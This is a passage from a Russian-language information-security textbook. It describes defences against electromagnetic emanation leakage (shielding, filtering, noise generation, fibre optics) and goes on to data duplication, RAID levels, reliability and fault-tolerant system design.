тический спектр сигналов убывает с ростом частоты, но эффективность
излучения при этом увеличивается, и уровень излучений может оста-
ваться постоянным до частот нескольких гигагерц. Резонансы из-за па-
235
разитных связей могут вызывать усиление излучения сигналов на неко-
торых частотах спектра[20;26].
5.1.2. Защита информации от утечки по каналам ПЭМИН
Работа средств вычислительной техники сопровождается электро-

магнитными излучениями и наводками на соединительные проводные
линии и цепи "питания", "земля", возникающими вследствие электро-
магнитных воздействий в ближней зоне излучения, в которую могут по-
падать также провода вспомогательной и посторонней аппаратуры.
Электромагнитные излучения, даже если они отвечают допустимым
техническим нормам, не являются безопасными с точки зрения утечки
секретной ин формации и несанкционированного доступа к ней.
В некоторых случаях информацию, обрабатываемую СВТ можно
восстановить путем анализа электромагнитных излучений и наводок.
Для этого необходимы их прием и декодирование. Одно время счита-
лось очень трудным делом расшифровать информацию, содержащуюся
в излучении. Поэтому восстановление информации после приема под
силу только профессионалам, располагающим очень сложной аппарату-
рой обнаружения и декодирования. Однако исследования показали, что
восстановление информации от некоторых СВТ возможно с помощью
общедоступных радиоэлектронных средств. В частности, при восста-
новлении информации с дисплеев можно использовать обычный черно-
белый телевизор, в котором сделаны незначительные усовершенствова-
ния. Если дисплей является элементом вычислительной системы, то он
может оказаться самым слабым ее звеном, которое сведет на нет все ме-
ры по увеличению безопасности излучений, принятые во всех остальных
частях системы.
Применение в СВТ импульсных сигналов прямоугольной формы и
высокочастотной коммутации приводит к тому, что в спектре излучений
будут компоненты с частотами вплоть до СВЧ. Хотя энергетический
спектр сигналов убывает с ростом частоты, эффективность излучения при
этом увеличивается, и уровень излучений может оставаться постоянным
до частот нескольких ГГц. Резонансы из-за паразитных связей могут вы-
зывать усиление излучения сигналов на некоторых частотах спектра.
В целях защиты секретной информации от утечки за счет побочного
электромагнитного излучения и наводок производится измерение уровня
опасных сигналов на расстоянии от источника (дисплея, печатающего
устройства, кабеля и т.д.). Замеры производят в нескольких точках на
разных расстояниях от источника с помощью специальной приемной
236
аппаратуры. Если уровень сигнала на границе установленной зоны пре-
высил допустимые значения, применяют защитные меры.
Защитные меры могут носить различный характер в зависимости от
сложности, стоимости и времени их реализации, которые определяются
при создании конкретной вычислительной системы. Такими мерами мо-
гут быть: доработка аппаратуры с целью уменьшения уровня сигналов,
установка специальных фильтров, параллельно работающих аппаратных
генераторов шума, специальных экранов и другие меры. В числе этих
мер большие надежды возлагаются на применение в линиях и каналах
связи волоконно-оптических кабелей (ВОК), которые обладают следу-
ющими преимуществами:
 отсутствием электромагнитного излучения во внешнюю среду;
 устойчивостью к внешним электромагнитным излучениям;
 большой помехозащищенностью;
 скрытностью передачи;
 малыми габаритами (что позволяет прокладывать их рядом с уже
существующими кабельными линиями);
 устойчивостью к воздействиям агрессивной среды.
С точки зрения защиты информации ВОК имеют еще одно пре-
имущество: подключение к ним с целью перехвата передаваемых дан-
ных представляет собой значительно более сложную задачу, чем под-
ключение к обычному проводу или кабелю с помощью индуктивных
датчиков и прямого подключения. Однако замена одного кабеля другим
связана с введением электрооптических и оптико-электрических преоб-
разователей, на которые и перекладывается проблема обеспечения без-
опасности информации.
Защита информации от утечки по электромагнитным каналам — это
комплекс мероприятий, исключающих или ослабляющих возможность
неконтролируемого выхода конфиденциальной информации за пределы
контролируемой зоны за. счет электромагнитных полей побочного ха-
рактера и наводок.
Для защиты информации от утечки по электромагнитным каналам
применяются как общие методы Защиты от утечки, так и специфические
— именно для этого вида каналов. Кроме того, защитные действия можно
классифицировать на конструкторско-технологические решения, ориен-
тированные на исключение возможности возникновения таких каналов, и
эксплуатационные, связанные с обеспечением условий использования тех
или иных технических средств в условиях производственной и трудовой
деятельности.
237
Конструкторско-технологические мероприятия по локализации
возможности образования условий возникновения каналов утечки ин-
формации за счет побочных электромагнитных излучений и наводок - в
технических средствах обработки и передачи информации сводятся к ра-
циональным конструкторско-технологическим решениям, к числу кото-
рых относятся:
 экранирование элементов и узлов аппаратуры;
 ослабление электромагнитной, емкостной, индуктивной связи
между элементами и токонесущими проводами;
 фильтрация сигналов в цепях питания и заземления и другие меры,
связанные с использованием ограничителей, развязывающих це-
пей, систем взаимной компенсации, ослабителей и других мер по
ослаблению или уничтожению ПЭМИН
Экранирование позволяет защитить их от нежелательных воздей-
ствий акустических и электромагнитных сигналов и излучений собственных
электромагнитных полей, а также ослабить (или исключить) паразитное
влияние внешних излучений. Экранирование бывает электростатиче-
ское, магнитостатическое и электромагнитное.
Электростатическое экранирование заключается в замыкании сило-
вых линий электростатического поля источника на поверхность экрана и
отводе наведенных зарядов на массу и на землю. Такое экранирование
эффективно для устранения емкостных паразитных связей. Экранирую-
щий эффект максимален на постоянном токе и с повышением частоты
снижается.
Магнитостатическое экранирование основано на замыкании сило-
вых линий магнитного поля источника в толще экрана, обладающего
малым магнитным сопротивлением для постоянного тока и в области
низких частот.
С повышением частоты сигнала применяется исключительно электро-
магнитное экранирование. Действие электромагнитного экрана основано
на том, что высокочастотное электромагнитное поле ослабляется им же
созданным (благодаря образующимся в толще экрана вихревым токам)
полем обратного направления.
Если расстояние между экранирующими цепями, проводами, при-
борами составляет 10% от четверти длины волны, то можно считать, что
электромагнитные связи этих цепей осуществляются за счет обычных элек-
трических и магнитных полей, а не в результате переноса энергии в про-
странстве с помощью электромагнитных волн. Это дает возможность от-
дельно рассматривать экранирование электрических и магнитных полей,
238
что очень важно, так как на практике преобладает какое-либо одно из по-
лей и подавлять другое нет необходимости.
Заземление и металлизация аппаратуры и ее элементов служат
надежным средством отвода наведенных сигналов на землю (сопротивле-
ние заземления не должно быть более 1 Ом), ослабления паразитных свя-
зей и наводок между отдельными цепями.
Фильтры различного назначения служат для подавления или ослаб-
ления сигналов при их возникновении или распространении, а также для
защиты систем питания аппаратуры обработки информации. Для этих
же целей могут применяться и другие технологические решения.
Эксплуатационные меры ориентированы на выбор мест установки
технических средств с учетом особенностей их электромагнитных полей
с таким расчетом, чтобы исключить их выход за пределы контролируемой
зоны. В этих целях возможно осуществлять экранирование помещений, в
которых находятся средства с большим уровнем побочных электромаг-
нитных излучений (ПЭМИ).
Особо необходимо остановится на волоконно-оптических системах.
С точки зрения защиты информации волоконно-оптические кабели
имеют преимущество: подключение к ним с целью перехвата передава-
емых данных представляет собой значительно более сложную задачу,
чем подключение к обычному проводу или кабелю с помощи индуктив-
ных датчиков и прямого подключения . Однако замена одного кабеля
другим связана с введением электрооптических и оптикоэлектрических
преобразователей, на которые и перекладывается проблема обеспечения
безопасности информации. Решение этой проблемы находится в упомя-
нутой выше области.
5.1.3. Методы и средства защиты от электромагнитных

излучений и наводок
Все методы защиты от электромагнитных излучений и наводок
можно разделить на пассивные и активные.
Пассивные методы обеспечивают уменьшение уровня опасного
сигнала или снижение информативности сигналов.
Активные методы защиты направлены на создание помех в каналах
ПЭМИН, затрудняющих прием и выделение полезной информации из
перехваченных злоумышленником сигналов.
Активные методы защиты от ПЭМИН предполагают использование
генераторов шумов. В качестве маскирующих используются случайные
помехи с нормальным законом распределения спектральной плотности
239
мгновенных значений амплитуд (гауссовские помехи) и прицельные по-
мехи, представляющие собой случайную последовательность сигналов
помехи, идентичных побочным сигналам.
Используется пространственное и линейное зашумление. Простран-
ственное зашумление осуществляется за счет излучения с помощью ан-
тенн электромагнитных сигналов в пространство. Применяется локаль-
ное пространственное зашумление для защиты конкретного элемента
АС и объектовое пространственное зашумление для защиты от побоч-
ных электромагнитных излучений АС всего объекта. При локальном
пространственном зашумлении используются прицельные помехи. Ан-
тенна находится рядом с защищаемым элементом АС. Объектовое про-
странственное зашумление осуществляется, как правило, несколькими
генераторами со своими антеннами, что позволяет создавать помехи во
всех диапазонах побочных электромагнитных излучений всех излучаю-
щих устройств объекта.
При использовании линейного зашумления генераторы прицельных
помех подключаются к линиям для создания в них электрических помех.
Пространственное зашумление должно обеспечивать невозмож-
ность выделения побочных излучений на фоне создаваемых помех во
всех диапазонах излучения и, вместе с тем, уровень создаваемых помех
не должен превышать санитарных норм и норм по электромагнитной
совместимости радиоэлектронной аппаратуры.
Для блокирования угрозы облучения электронных блоков и маг-
нитных запоминающих устройств мощными внешними электромагнит-
ными импульсами используются пассивные методы защиты.
Защита от побочных электромагнитных излучений и наводок осу-
ществляется как пассивными, так и активными методами.
Пассивные методы защиты от ПЭМИН могут быть разбиты на три
группы (рис. 42).
240
Рис. 42. Классификация пассивных методов защиты от ПЭМИН
Экранирование является одним из самых эффективных методов за-
щиты от ПЭМИН. Под экранированием понимается размещение элемен-
тов КС, создающих электрические, магнитные и электромагнитные по-
ля, в заземленных, пространственно замкнутых конструкциях из токо-
проводящего материала. Обычно экраны изготавливаются из листовой
стали или металлической сетки. В настоящее время в качестве экранов
используются металлизированные ткани и металлические пленки, полу-
чаемые напылением на пластмассовых поверхностях и стекле.
Экранирование электрического поля заземленным экраном обеспе-
чивается нейтрализацией электрических зарядов, стекающих по зазем-
ляющему контуру. Контур заземления должен иметь сопротивление не
более 4 0м.
Физические процессы, протекающие в экранах, зависят от частоты
магнитного поля. Низкочастотные магнитные поля шунтируются экраном
за счет направленности силовых линий вдоль стенок экрана. Этот эффект
вызывается большей магнитной проницаемостью материала экрана по
сравнению с воздухом. Высокочастотное магнитное поле вызывает воз-
никновение переменных индукционных вихревых токов, которые созда-
ваемым ими магнитным полем препятствуют распространению побочно-
го магнитного поля. Заземление не влияет на экранирование магнитных
полей. Поглощающая способность экрана зависит от частоты побочного
излучения и от материала, из которого изготавливается экран. Чем ниже
частота излучения, тем большей должна быть толщина экрана. Для излу-
чений в диапазоне средних волн и выше достаточно эффективным явля-
ется экран толщиной 0,5 – 1,5 мм. Для излучений на частотах свыше 10
МГц достаточно иметь экран из меди или серебра толщиной 0,1 мм.
241
Электромагнитные излучения блокируются методами высокоча-
стотного электрического и магнитного экранирования.
Экранирование осуществляется на пяти уровнях:
1. Уровень элементов схем.
2. Уровень блоков.
3. Уровень устройств.
4. Уровень кабельных линий.
5. Уровень помещений.
Элементы схем с высоким уровнем побочных излучений могут по-
мещаться в металлические или металлизированные напылением зазем-
ленные корпуса. Начиная с уровня блоков, экранирование осуществля-
ется с помощью конструкций из листовой стали, металлических сеток и
напыления. Экранирование кабелей осуществляется с помощью метал-
лической оплетки, стальных коробов или труб.
При экранировании помещений используются: листовая сталь тол-
щиной до 2 мм, стальная (медная, латунная) сетка с ячейкой до 2,5 мм. В
защищенных помещениях экранируются двери и окна. Окна экраниру-
ются сеткой, металлизированными шторами, металлизацией стекол и
оклеиванием их токопроводящими пленками. Двери выполняются из
стали или покрываются токопроводящими материалами (стальной лист,
металлическая сетка). Особое внимание обращается на наличие электри-
ческого контакта токопроводящих слоев двери и стен по всему перимет-
ру дверного проема. При экранировании полей недопустимо наличие за-
зоров, щелей в экране. Размер ячейки сетки должен быть не более 0,1
длины волны излучения.
Выбор числа уровней и материалов экранирования осуществляется
с учетом:
характеристик излучения (тип излучения, частота и мощность);
требований к уровню излучения за пределами контролируемой зо-
ны и размеров зоны;
наличия или отсутствия других методов защиты от ПЭМИН;
минимизации затрат на экранирование.
В защищенной ПЭВМ, например, экранируются блоки управления
электронно-лучевой трубкой, корпус выполняется из стали или металли-
зируется изнутри, экран покрывается металлической пленкой и (или)
защищается металлической сеткой.
Экранирование, помимо выполнения своей прямой функции защи-
ты от ПЭМИН, значительно снижает вредное воздействие электромаг-
242
нитных излучений на организм человека. Экранирование позволяет так-
же уменьшить влияние электромагнитных шумов на работу устройств.
Способы защиты от ПЭМИН, объединенные в группу " Снижение
мощности излучений и наводок ", реализуются с целью снижения уров-
ня излучения и взаимного влияния элементов АС.
К данной группе относятся следующие методы:
 изменение электрических схем;
 использование оптических каналов связи;
 изменение конструкции;
 использование фильтров;
гальваническая развязка в системе питания.
Изменения электрических схем осуществляются для уменьшения
мощности побочных излучений. Это достигается за счет использования
элементов с меньшим излучением, уменьшения крутизны фронтов сиг-
налов, предотвращения возникновения паразитной генерации, наруше-
ния регулярности повторений информации.
Перспективным направлением борьбы с ПЭМИН является исполь-
зование оптических каналов связи. Для передачи информации на боль-
шие расстояния успешно используются волоконно-оптические кабели.
Передачу информации в пределах одного помещения (даже больших
размеров) можно осуществлять с помощью беспроводных систем, ис-
пользующих излучения в инфракрасном диапазоне. Оптические каналы
связи не порождают ПЭМИН. Они обеспечивают высокую скорость пе-
редачи и не подвержены воздействию электромагнитных помех.
Изменения конструкции сводятся к изменению взаимного располо-
жения отдельных узлов, блоков, кабелей, сокращению длины шин.
Использование фильтров является одним из основных способов за-
щиты от ПЭМИН. Фильтры устанавливаются как внутри устройств, си-
стем для устранения распространения и возможного усиления наведен-
ных побочных электромагнитных сигналов, так и на выходе из объектов
линий связи, сигнализации и электропитания. Фильтры рассчитываются
таким образом, чтобы они обеспечивали снижение сигналов в диапазоне
побочных наводок до безопасного уровня и не вносили существенных
искажений полезного сигнала.
Полностью исключается попадание побочных наведенных сигналов
во внешнюю цепь электропитания при наличии генераторов питания,
которые обеспечивают гальваническую развязку между первичной и
вторичной цепями.
243
Использование генераторов позволяет также подавать во вторич-
ную цепь электропитание с другими параметрами по сравнению с пер-
вичной цепью. Так, во вторичной цепи может быть изменена частота по
сравнению с первичной цепью. Генераторы питания, за счет инерцион-
ности, позволяют сглаживать пульсации напряжения и кратковременные
отключения в первичной цепи.
Снижение информативности сигналов ПЭМИН, затрудняющее их
использование при перехвате, осуществляется следующими путями:
- специальные схемные решения;
- кодирование информации.
В качестве примеров специальных схемных решений можно приве-
сти такие, как замена последовательного кода параллельным, увеличе-
ние разрядности параллельных кодов, изменение очередности развертки
строк на мониторе и т. п.
Для предотвращения утечки информации может использоваться ко-
дирование информации, в том числе и криптографическое преобразова-
ние.
5.2. Современные технологии повышения надежности и

отказоустойчивости
Для блокирования (парирования) случайных угроз безопасности
информации в АС должен быть решен комплекс задач (см. рис. 43) [22].
Дублирование информации
Дублирование информации является одним из самых эффективных
способов обеспечения целостности информации. Он обеспечивает защи-
ту информации, как от случайных угроз, так и от преднамеренных воз-
действий.
В зависимости от ценности информации, особенностей построения
и режимов функционирования АС могут использоваться различные ме-
тоды дублирования. Множество методов может быть классифицировано
по различным признакам.
244
Рис. 43. Задачи защиты информации в АС от случайных угроз
По времени восстановления информации методы дублирования мо-
гут быть разделены на:
 оперативные;
 неоперативные.
К оперативным методам относятся методы дублирования информа-
ции, которые позволяют использовать дублирующую информацию в ре-
альном масштабе времени. Это означает, что переход к использованию
дублирующей информации осуществляется за время, которое позволяет
выполнить запрос на использование информации в режиме реального
времени для данной АС. Все методы, не обеспечивающие выполнения
этого условия, относят к неоперативным методам дублирования.
По используемым для целей дублирования средствам методы дуб-
лирования можно разделить на методы, использующие:
 дополнительные внешние запоминающие устройства (блоки);
 специально выделенные области памяти на несъемных машин-
ных носителях;
 съемные носители информации.
По числу копий методы дублирования делятся на:
 одноуровневые;
 многоуровневые.
Как правило, число уровней не превышает 3. По степени простран-
ственной удаленности носителей основной и дублирующей информации
методы дублирования могут быть разделены на методы:
245
 сосредоточенного дублирования;
 рассредоточенного дублирования.
Для определённости целесообразно считать методами сосредото-
ченного дублирования такие методы, для которых носители с основной
и дублирующей информацией находятся в одном помещении. Все дру-
гие методы относятся к рассредоточенным.
В соответствии с процедурой дублирования различают методы:
 полного копирования;
 зеркального копирования;
 частичного копирования;
 комбинированного копирования.
При полном копировании дублируются все файлы.
При зеркальном копировании любые изменения основной инфор-
мации сопровождаются такими же изменениями и дублирующей ин-
формации. При таком дублировании основная информация и дубль все-
гда идентичны.
Частичное копирование предполагает создание дублей определен-
ных файлов, например, файлов пользователя. Одним из видов частично-
го копирования, получившим название инкрементного копирования, яв-
ляется метод создания дублей файлов, измененных со времени послед-
него копирования.
Комбинированное копирование допускает комбинации, например,
полного и частичного копирования с различной периодичностью их
проведения.
Наконец, по виду дублирующей информации методы дублирования
разделяются на:
 методы со сжатием информации;
 методы без сжатия информации.
В качестве внешних запоминающих устройств для хранения дубли-
рующей информации используются накопители на жестких магнитных
дисках и магнитных лентах. Накопители на жестких магнитных дисках
применяются обычно для оперативного дублирования информации.
Идеология надежного и эффективного хранения информации на жестких
дисках нашла свое отражение в так называемой технологии RAID (Re-
dundant Array of Independent Disks). Эта технология реализует концеп-
цию создания блочного устройства хранения данных с возможностями
параллельного выполнения запросов и восстановления информации при
отказах отдельных блоков накопителей на жестких магнитных дисках.
246
Устройства, реализующие эту технологию, называют подсистемами
RAID или дисковыми массивами RAID.
Технология RAID явилась результатом развития технологий надеж-
ного хранения информации на жестких дисках, которые применяются и
сейчас. Наиболее простым методом дублирования данных в АС является
использование выделенных областей памяти на рабочем диске. Таким
образом, дублируется наиболее важная системная информация. Напри-
мер, таблицы каталогов и таблицы файлов дублируются таким образом,
чтобы они были размещены на цилиндрах и поверхностях жесткого дис-
ка (пакета дисков), отличных от тех, на которых находятся рабочие таб-
лицы. Такое дублирование защищает от полной потери информации при
повреждении отдельных участков поверхности дисков.
Очень надежным методом оперативного дублирования является ис-
пользование зеркальных дисков. Зеркальным называют жесткий магнит-
ный диск отдельного накопителя, на котором хранится информация
полностью идентичная информации на рабочем диске. Достигается это
за счет параллельного выполнения всех операций записи на оба диска.
При отказе рабочего накопителя автоматически осуществляется переход
на работу с зеркальным диском практически без потерь времени при
полной сохранности информации.
Для особо ответственных применений (военные системы, АС тех-
нологическими процессами, серверы сетей и некоторые другие) могут
использоваться более одного резервного диска, подключенных к отдель-
ным контроллерам и блокам питания. Зеркальное дублирование обеспе-
чивает надежное оперативное дублирование, но требует, как минимум,
вдвое больших аппаратных затрат.
Зеркальное дублирование предусматривается на 1-м уровне RAID.
Всего в технологии RAID выделяется 6 основных уровней с 0-го по 5-й.
С учетом различных модификаций их может быть больше. Уровни RAID
определяют порядок записи на независимые диски и порядок восстанов-
ления информации. Различные уровни RAID обеспечивают различное
быстродействие подсистемы и различную эффективность восстановле-
ния информации. 0-ой уровень RAID предполагает поочередное исполь-
зование блоков (накопителей на магнитных дисках) для записи файлов.
Дублирование не используется.
На 2-ом уровне биты информации поочередно размещаются на дис-
ках. Данные размещаются на дисках с дублированием. Начиная с 3-го
уровня, для восстановления информации используется не дублирование
247
данных, а контрольная информация. Восстановление возможно при от-
казе одного диска.
На 3-м уровне байты данных поочередно записываются на диски.
Контрольная информация (контрольные суммы) записывается на один
выделенный диск.
Начиная с 4-го уровня, поочередная запись на диски ведется блока-
ми. На 4-м уровне для записи контрольной информации отводится выде-
ленный диск. Подсистема 4-го уровня допускает параллельное выполне-
ние запросов на чтение, но запись осуществляется последовательно, так
как контрольная информация записывается на один диск.
На 5-м уровне осуществляется поочередная запись на диски, как
блоков данных, так и контрольной информации. На этом уровне воз-
можно осуществлять одновременно несколько операций чтения или за-
писи. В случае отказа одного диска он восстанавливается с помощью
контрольной информации. Для восстановления информации с отказав-
шего диска требуется до 10 минут времени.
Блочная конструкция подсистем RAID позволяет наращивать число
дисков. Реальные подсистемы поддерживают несколько уровней, кото-
рые выбираются пользователем с учетом требований, предъявляемых к
HDD конкретной АС. В подсистемах RAID, как правило, используются
резервные источники питания, что существенно повышает отказоустой-
чивость таких подсистем.
Для дублирования информации используются также накопители на
магнитных лентах. Такие устройства обладают большой емкостью, но
значительно уступают накопителям на магнитных дисках по времени
доступа к информации.
В настоящее время для хранения дублирующей информации ис-
пользуются устройства, получившие название ленточные системы с ав-
томатической сменой кассет. Их называют также библиотеками. Такие
системы состоят из одного или нескольких лентопротяжных механиз-
мов, механизма перемещения кассет и магазина для кассет. На одной
кассете может храниться 10 Гбайт сжатой или 4 Гбайта несжатой ин-
формации. Если учесть, что в магазине системы может находиться до 60
кассет (Spectra Logic 4655), то емкость таких систем позволяет хранить
огромные массивы данных. Наряду с такими мощными системами могут
использоваться и компактные системы с емкостью магазина в несколько
кассет. Например, ленточная система Conner Peripherals 4586 NP имеет
магазин емкостью 4 кассеты. С учетом возможности замены кассет та-
кие системы позволяют дублировать на ленты объемы информации,
248
ограниченные только наличием свободных кассет. Как правило, библио-
теки используются для неоперативного дублирования. Поэтому инфор-
мация на ленты обычно записывается в сжатом виде. С помощью этих
устройств осуществляется полное, частичное и комбинированное копи-
рование с созданием копий различных уровней.
Съемные машинные носители могут использоваться для дублиро-
вания информации без использования специальных аппаратных средств.
Для этих целей используются, как правило, гибкие магнитные диски,
оптоэлектронные диски, а также жесткие съемные магнитные диски и
магнитные ленты.
Методы использования съемных носителей информации сходны с
методами использования ленточных систем с автоматической сменой
кассет.
При использовании многоуровневого дублирования может быть ре-
ализован следующий подход к созданию и использованию копий. В ка-
честве эталона верхнего уровня используется редко изменяемая инфор-
мация (программы, постоянные исходные данные). Носитель с этой ин-
формацией используется только для восстановления информации, если
ее невозможно восстановить с эталонов более низкого уровня, а также
при изменениях информации и при периодическом контроле. Эталон
второго уровня получается путем полного копирования информации с
определенной периодичностью, например, один раз в сутки. На эталон
первого уровня осуществляется инкрементное копирование либо по
времени (раз в смену), либо после существенных и важных изменений.
Например, получение важных сообщений по сети или результатов вы-
полнения программ.
Распределенное копирование достижимо в компьютерных сетях и
является практически единственным способом обеспечения целостности
и доступности информации при стихийных бедствиях и крупных авариях.
Повышение надежности АС
Под надежностью понимается свойство системы выполнять возло-
женные на нее задачи в определенных условиях эксплуатации. При
наступлении отказа компьютерная система не может выполнять все
предусмотренные документацией задачи, т.е. переходит из исправного
состояния в неисправное. Если при наступлении отказа АС способна
выполнять заданные функции, сохраняя значения основных характери-
стик в пределах, установленных технической документацией, то система
находится в работоспособном состоянии.
249
С точки зрения обеспечения безопасности информации необходимо
обеспечивать хотя бы работоспособное состояние АС. Для решения этой за-
дачи необходимо обеспечить высокую надежность функционирования ал-
горитмов, программ и технических (аппаратных) средств. Поскольку алго-
ритмы в АС реализуются за счет выполнения программ, то надежность ал-
горитмов отдельно не рассматривается. В этом случае считается, что надеж-
ность АС обеспечивается надежностью программных и аппаратных средств.
Надежность АС достигается за счет решения комплекса задач на этапах:
 разработки;
 производства;
 эксплуатации.
Для программных средств рассматриваются этапы разработки и
эксплуатации. Этап разработки является определяющим при создании
надежных систем.
На этом этапе основными направлениями повышения надежности
программных средств являются:
 корректная постановка задачи на разработку;
 использование прогрессивных технологий программирования;
 контроль правильности функционирования.
Корректность постановки задачи достигается в результате совмест-
ной работы специалистов предметной области и высокопрофессиональ-
ных программистов-алгоритмистов.
В настоящее время для повышения качества программных продуктов
используются современные технологии программирования (например,
CASE технология). Эти технологии позволяют значительно сократить воз-
можности внесения субъективных ошибок разработчиков. Они характери-
зуются высокой автоматизацией процесса программирования, использова-
нием стандартных программных модулей, широкими возможностями ком-
плексирования этих модулей и тестирования их совместной работы.
Контроль правильности функционирования алгоритмов и программ
осуществляется на каждом этапе разработки и завершается комплекс-
ным контролем, охватывающим все решаемые задачи и режимы.
На этапе эксплуатации программные средства дорабатываются, в
них устраняются замеченные ошибки. Поддерживается целостность
программных средств и актуальность данных, используемых этими
средствами.
Надежность технических средств АС обеспечивается на всех эта-
пах. На этапе разработки выбираются элементная база, технология про-
250
изводства и структурные решения, обеспечивающие максимально до-
стижимую надежность АС в целом.
Велика роль в процессе обеспечения надежности ТС и этапа произ-
водства. Главными условиями выпуска надежной продукции являются
высокий технологический уровень производства и организация эффек-
тивного контроля качества выпускаемых ТС.
Удельный вес этапа эксплуатации ТС в решении проблемы обеспе-
чения надежности АС в последние годы значительно снизился. Для
определённых видов вычислительной техники, таких как персональные
ЭВМ, уровень требований к процессу технической эксплуатации сни-
зился практически до уровня эксплуатации бытовых приборов. Второй
особенностью нынешнего этапа эксплуатации средств вычислительной
техники является сближение эксплуатации технических и программных
средств (особенно средств общего программного обеспечения). Тем не
менее, роль этапа эксплуатации ТС остается достаточно значимой в ре-
шении задачи обеспечения надежности АС и, прежде всего, надежности
сложных систем.
Создание отказоустойчивых КС
Отказоустойчивость – это свойство АС сохранять работоспособ-
ность при отказах отдельных устройств, блоков, схем. Известны три ос-
новных подхода к созданию отказоустойчивых систем:
 простое резервирование;
 помехоустойчивое кодирование информации;
 создание адаптируемых систем.
Любая отказоустойчивая система обладает избыточностью. Одним
из наиболее простых и действенных путей создания отказоустойчивых
систем является простое резервирование. Простое резервирование осно-
вано на использовании устройств, блоков, узлов, схем только в качестве
резервных. При отказе основного элемента осуществляется переход на
использование резервного. Резервирование осуществляется на различ-
ных уровнях: на уровне устройств, на уровне блоков, узлов и т. д. Резер-
вирование отличается также и глубиной. Для целей резервирования мо-
гут использоваться один резервный элемент и более. Уровни и глубина
резервирования определяют возможности системы парировать отказы, а
также аппаратные затраты. Такие системы должны иметь несложные
аппаратно-программные средства контроля работоспособности элемен-
тов и средства перехода на использование, при необходимости, резерв-
ных элементов. Примером резервирования может служить использова-
ние "зеркальных" накопителей на жестких магнитных дисках. Недостат-
251
ком простого резервирования являются значительные затраты средств,
которые используются только для повышения отказоустойчивости.
Помехоустойчивое кодирование основано на использовании ин-
формационной избыточности. Рабочая информация в АС дополняется
определенным объемом специальной контрольной информации. Нали-
чие этой контрольной информации (контрольных двоичных разрядов)
позволяет путем выполнения определенных действий над рабочей и
контрольной информацией определять ошибки и даже исправлять их.
Так как ошибки являются следствием отказов средств КС, то, используя
исправляющие коды, можно парировать часть отказов. Исправляющие
возможности кодов для конкретного метода помехоустойчивого кодиро-
вания зависят от степени избыточности. Чем больше используется кон-
трольной информации, тем шире возможности кода по обнаружению и
исправлению ошибок. Ошибки характеризуются кратностью, т.е. коли-
чеством двоичных разрядов, в которых одновременно искажено содер-
жимое. Помехоустойчивые коды обладают различными возможностями
по обнаружению и исправлению ошибок различной кратности. Так клас-
сический код Хемминга обнаруживает и исправляет однократные ошиб-
ки, а двукратные ошибки – только обнаруживает.
Помехоустойчивое кодирование наиболее эффективно при париро-
вании самоустраняющихся отказов, называемых сбоями. Помехоустой-
чивое кодирование при создании отказоустойчивых систем, как правило,
используется в комплексе с другими подходами повышения отказо-
устойчивости.
Наиболее совершенными системами, устойчивыми к отказам, яв-
ляются адаптивные системы. В них достигается разумный компромисс
между уровнем избыточности, вводимым для обеспечения устойчивости
(толерантности) системы к отказам, и эффективностью использования
таких систем по назначению.
В адаптивных системах реализуется так называемый принцип эле-
гантной деградации. Этот принцип предполагает сохранение работоспо-
собного состояния системы при некотором снижении эффективности
функционирования в случаях отказов ее элементов.
Адаптивные системы содержат аппаратно-программные средства
для автоматического контроля работоспособности элементов системы и
осуществления ее реконфигурации при возникновении отказов элемен-
тов. При реконфигурации восстанавливается необходимая информация
(при ее утрате), отключается отказавший элемент, осуществляется изме-
нение связей и режимов работы элементов системы.
252
Простым примером адаптивной АС может служить ЭВМ, имеющая
в своем составе математический и графический сопроцессоры, а также
оперативную память блочной структуры. Все сопроцессоры и блоки па-
мяти используются для достижения максимальной производительности
ЭВМ. При отказе какого-либо сопроцессора он логически отключается
от ЭВМ, а его функции выполняет центральный процессор. При этом
система деградирует, так как снижается производительность ЭВМ. Но в
то же время система сохраняет работоспособность и может завершить
вычислительный процесс. При отказе блока оперативной памяти он от-
ключается, и емкость памяти уменьшается. Чтобы избежать потерь ин-
формации при отказах процессоров и блоков оперативной памяти, вы-
числительный процесс возобновляется либо сначала, либо с последней
контрольной точки.
Механизм контрольных точек используется обычно при выполне-
нии сложных трудоемких программ. Он заключается в запоминании
всей необходимой информации для возобновления выполнения про-
граммы с определенной точки. Запоминание осуществляется через опре-
деленные интервалы времени.
В адаптивных системах даже внешние устройства не используются
только как резервные. Информация, необходимая для восстановления
данных с отказавшего HDD, хранится на накопителях, которые исполь-
зуются для хранения и рабочей информации. Примером таких систем
являются RAID системы.
Блокировка ошибочных операций
Ошибочные операции или действия могут вызываться отказами ап-
паратных и программных средств, а также ошибками пользователей и
обслуживающего персонала. Некоторые ошибочные действия могут
привести к нарушениям целостности, доступности и конфиденциально-
сти информации. Ошибочная запись в ОП и на HDD, нарушение разгра-
ничения памяти при мультипрограммных режимах работы ЭВМ, оши-
бочная выдача информации в канал связи, короткие замыкания и обрыв
проводников – вот далеко не полный перечень ошибочных действий, ко-
торые представляют реальную угрозу безопасности информации в АС.
Для блокировки ошибочных действий используются технические и
аппаратно-программные средства.
Технические средства используются в основном для предотвраще-
ния ошибочных действий людей. К таким средствам относятся блокиро-
вочные тумблеры, защитные экраны и ограждения, предохранители,
средства блокировки записи на магнитные ленты и магнитные дискеты.
253
Аппаратно-программные средства позволяют, например, блокиро-
вать вычислительный процесс при нарушениях программами адресных
пространств оперативной памяти с помощью граничных регистров или
ключей защиты. При мультипрограммных режимах работы ЭВМ опера-
тивная память распределяется между программами. Приведенный меха-
низм позволяет сравнивать адреса команд активной программы с грани-
цами разрешенной области ОП для этой программы и блокировать об-
ращение при нарушении границ. Аппаратно-программные средства ис-
пользуются также для блокирования выдачи информации в неразрешен-
ные каналы связи, запрета выполнения операций, которые доступны
только в определенных режимах, например, в режиме работы операци-
онной системы. С помощью аппаратно-программных средств может
быть заблокирована запись в определенные области внешних запомина-
ющих устройств и некоторые другие операции.
На программном уровне могут устанавливаться атрибуты файлов, в
том числе и атрибут, запрещающий запись в файлы. С помощью про-
граммных средств устанавливается режим обязательного подтверждения
выполнения опасных операций, таких как уничтожение файлов, размет-
ка или форматирование HDD и другие.
Оптимизация взаимодействия человека с КС
Одним из основных направлений защиты информации в АС от не-
преднамеренных угроз является сокращения числа ошибок пользовате-
лей и обслуживающего персонала, а также минимизация последствий
этих ошибок. Для достижения этих целей необходимы:
 научная организация труда человека;
 воспитание и обучение пользователей и персонала;
 анализ и совершенствование процессов взаимодействия человека с
АС.
 Научная организация труда предполагает:
 оборудование рабочих мест;
 оптимальный режим труда и отдыха;
 дружественный интерфейс (связь, диалог) человека с АС.
Рабочее место пользователя или специалиста из числа обслужива-
ющего персонала должно быть оборудовано в соответствии с рекомен-
